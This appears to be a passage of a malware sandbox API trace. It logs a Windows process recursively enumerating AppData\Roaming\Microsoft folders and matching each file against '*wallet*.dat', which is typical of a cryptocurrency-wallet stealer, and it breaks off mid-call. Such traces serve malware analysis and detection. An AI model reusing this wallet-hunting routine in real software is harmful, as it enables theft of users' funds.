0 [0207.409] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.409] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1033", cAlternateFileName="")) returned 0 [0207.409] FindClose (in: hFindFile=0x5e7a48 | out: hFindFile=0x5e7a48) returned 1 [0207.409] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Excel", cAlternateFileName="")) returned 1 [0207.409] StrCmpCA (pszStr1="Excel", pszStr2=".") returned 23 [0207.409] StrCmpCA (pszStr1="Excel", pszStr2="..") returned 23 [0207.409] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel") returned 53 [0207.409] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.409] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Excel") returned 15 [0207.409] PathMatchSpecA (pszFile="Excel", pszSpec="*wallet*.dat") returned 0 [0207.409] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*") returned 55 [0207.409] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.412] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.412] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.412] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.412] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.412] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0207.412] StrCmpCA (pszStr1="XLSTART", pszStr2=".") returned 42 [0207.412] StrCmpCA (pszStr1="XLSTART", pszStr2="..") returned 42 [0207.413] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 61 [0207.413] StrCmpCA (pszStr1="Microsoft\\Excel", pszStr2="") returned 77 [0207.413] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Excel\\XLSTART") returned 23 [0207.413] PathMatchSpecA (pszFile="XLSTART", pszSpec="*wallet*.dat") returned 0 [0207.413] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned 63 [0207.413] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e78c8 [0207.413] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.413] FindNextFileA (in: hFindFile=0x5e78c8, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.413] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.413] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.413] FindNextFileA (in: hFindFile=0x5e78c8, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.413] FindClose (in: hFindFile=0x5e78c8 | out: hFindFile=0x5e78c8) returned 1 [0207.414] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0207.414] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.414] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0207.414] StrCmpCA (pszStr1="Internet Explorer", pszStr2=".") returned 27 [0207.414] StrCmpCA (pszStr1="Internet Explorer", pszStr2="..") returned 27 [0207.414] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 65 [0207.414] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.414] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer") returned 27 [0207.414] PathMatchSpecA (pszFile="Internet Explorer", pszSpec="*wallet*.dat") returned 0 [0207.414] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 67 [0207.414] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.414] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.414] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.415] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.415] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.415] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0207.415] StrCmpCA (pszStr1="Quick Launch", pszStr2=".") returned 35 [0207.415] StrCmpCA (pszStr1="Quick Launch", pszStr2="..") returned 35 [0207.415] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 78 [0207.415] StrCmpCA (pszStr1="Microsoft\\Internet Explorer", pszStr2="") returned 77 [0207.415] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch") returned 40 [0207.415] PathMatchSpecA (pszFile="Quick Launch", pszSpec="*wallet*.dat") returned 0 [0207.415] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 80 [0207.415] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x5e7e48 [0207.415] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.415] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0207.415] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.416] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.416] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0207.416] StrCmpCA (pszStr1="desktop.ini", pszStr2=".") returned 54 [0207.416] StrCmpCA (pszStr1="desktop.ini", pszStr2="..") returned 54 [0207.416] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 90 [0207.416] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0207.416] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 52 [0207.416] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0207.416] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*") returned 92 [0207.416] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x9ee78381, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="d", cAlternateFileName="J")) returned 0xffffffff [0207.416] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6654de95, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6657eabb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0207.416] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2=".") returned 31 [0207.416] StrCmpCA (pszStr1="Microsoft Outlook.lnk", pszStr2="..") returned 31 [0207.416] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0207.416] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0207.416] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 62 [0207.416] PathMatchSpecA (pszFile="Microsoft Outlook.lnk", pszSpec="*wallet*.dat") returned 0 [0207.416] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*") returned 102 [0207.416] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6654de95, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6657eabb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="M", cAlternateFileName="J")) returned 0xffffffff [0207.417] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0207.417] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2=".") returned 37 [0207.417] StrCmpCA (pszStr1="Shows Desktop.lnk", pszStr2="..") returned 37 [0207.417] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0207.417] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0207.417] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 58 [0207.417] PathMatchSpecA (pszFile="Shows Desktop.lnk", pszSpec="*wallet*.dat") returned 0 [0207.417] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*") returned 98 [0207.417] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d053a9f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d053a9f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x251fff9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="S", cAlternateFileName="J")) returned 0xffffffff [0207.417] FindNextFileA (in: hFindFile=0x5e7e48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19bc38, dwReserved1=0x1, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0207.417] StrCmpCA (pszStr1="User Pinned", pszStr2=".") returned 39 [0207.417] StrCmpCA (pszStr1="User Pinned", pszStr2="..") returned 39 [0207.417] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 90 [0207.417] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch", pszStr2="") returned 77 [0207.417] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 52 [0207.417] PathMatchSpecA (pszFile="User Pinned", pszSpec="*wallet*.dat") returned 0 [0207.417] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 92 [0207.417] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.418] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.418] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3fec53d2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xad13dd79, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad13dd79, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.418] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.418] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.418] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0207.418] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2=".") returned 27 [0207.418] StrCmpCA (pszStr1="ImplicitAppShortcuts", pszStr2="..") returned 27 [0207.418] wsprintfA (in: param_1=0x19b6a0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 111 [0207.418] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszStr2="") returned 77 [0207.418] wsprintfA (in: param_1=0x19b7a8, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 73 [0207.418] PathMatchSpecA (pszFile="ImplicitAppShortcuts", pszSpec="*wallet*.dat") returned 0 [0207.418] wsprintfA (in: param_1=0x19b370, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 113 [0207.418] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e88 [0207.419] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.419] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.419] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.419] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.419] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43708645, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.419] FindClose (in: hFindFile=0x5e7e88 | out: hFindFile=0x5e7e88) returned 1 [0207.420] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad13dd79, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xad164063, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xad18a23e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0207.420] StrCmpCA (pszStr1="TaskBar", pszStr2=".") returned 38 [0207.420] StrCmpCA (pszStr1="TaskBar", pszStr2="..") returned 38 [0207.420] wsprintfA (in: param_1=0x19b6a0, param_2="%s\\%s" | out: 